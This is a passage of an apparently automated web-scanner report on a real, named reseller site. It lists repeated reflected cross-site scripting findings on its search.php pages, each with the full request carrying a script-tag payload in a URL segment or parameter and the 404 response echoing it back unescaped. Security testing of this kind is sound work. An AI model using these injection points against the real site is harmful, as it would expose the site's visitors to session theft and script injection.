X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/imagesf467f<script>alert(1)</script>36ea4786e0e/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1524. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 745f4<script>alert(1)</script>9dd7e529eb5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating745f4<script>alert(1)</script>9dd7e529eb5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating745f4<script>alert(1)</script>9dd7e529eb5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1525. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 79785<script>alert(1)</script>2eb60dd8faf was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating/search.php79785<script>alert(1)</script>2eb60dd8faf?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/search.php79785<script>alert(1)</script>2eb60dd8faf?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1526. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3e9ef<a>ae54d6de9e3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3e9ef<a>ae54d6de9e3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3e9ef<a>ae54d6de9e3&opt=2 was not found on this server.</p>
...[SNIP]...

2.1527. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5a9ce<a>f6a18b3b92 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/rating/search.php?keyword=search...5a9ce<a>f6a18b3b92&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/search.php?keyword=search...5a9ce<a>f6a18b3b92&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1528. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload afef5<script>alert(1)</script>549f992c7c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&afef5<script>alert(1)</script>549f992c7c8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&afef5<script>alert(1)</script>549f992c7c8=1 was not found on this server.</p>
...[SNIP]...

2.1529. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 77b37<a>ad190333e95 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=277b37<a>ad190333e95 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=277b37<a>ad190333e95 was not found on this server.</p>
...[SNIP]...

2.1530. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99936<script>alert(1)</script>8695d18aec5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail99936<script>alert(1)</script>8695d18aec5/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail99936<script>alert(1)</script>8695d18aec5/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1531. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce1e3<script>alert(1)</script>063129b0146 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18ce1e3<script>alert(1)</script>063129b0146/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18ce1e3<script>alert(1)</script>063129b0146/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1532. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eec7<script>alert(1)</script>843c5c48a21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes9eec7<script>alert(1)</script>843c5c48a21/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes9eec7<script>alert(1)</script>843c5c48a21/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1533. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b2c1<script>alert(1)</script>3a514912ed0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos4b2c1<script>alert(1)</script>3a514912ed0/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos4b2c1<script>alert(1)</script>3a514912ed0/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1534. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b490b<script>alert(1)</script>d576158e140 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/imagesb490b<script>alert(1)</script>d576158e140/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/imagesb490b<script>alert(1)</script>d576158e140/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1535. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 79b0d<script>alert(1)</script>ee4b9114014 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/search.php79b0d<script>alert(1)</script>ee4b9114014?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/search.php79b0d<script>alert(1)</script>ee4b9114014?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1536. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4283d<a>e60f9ac36be was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4283d<a>e60f9ac36be&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4283d<a>e60f9ac36be&opt=2 was not found on this server.</p>
...[SNIP]...

2.1537. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b08e2<a>ca75dd32d48 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/search.php?keyword=search...b08e2<a>ca75dd32d48&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/search.php?keyword=search...b08e2<a>ca75dd32d48&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1538. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9e0ce<script>alert(1)</script>8504eb46b08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9e0ce<script>alert(1)</script>8504eb46b08=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9e0ce<script>alert(1)</script>8504eb46b08=1 was not found on this server.</p>
...[SNIP]...

2.1539. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6c883<a>0bafeb9ddac was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26c883<a>0bafeb9ddac HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26c883<a>0bafeb9ddac was not found on this server.</p>
...[SNIP]...

2.1540. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3485d<script>alert(1)</script>367a2be5661 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3485d<script>alert(1)</script>367a2be5661/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3485d<script>alert(1)</script>367a2be5661/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1541. http://www.resellerbase.com/detail/18/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35fcb<script>alert(1)</script>9ccdc8178ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

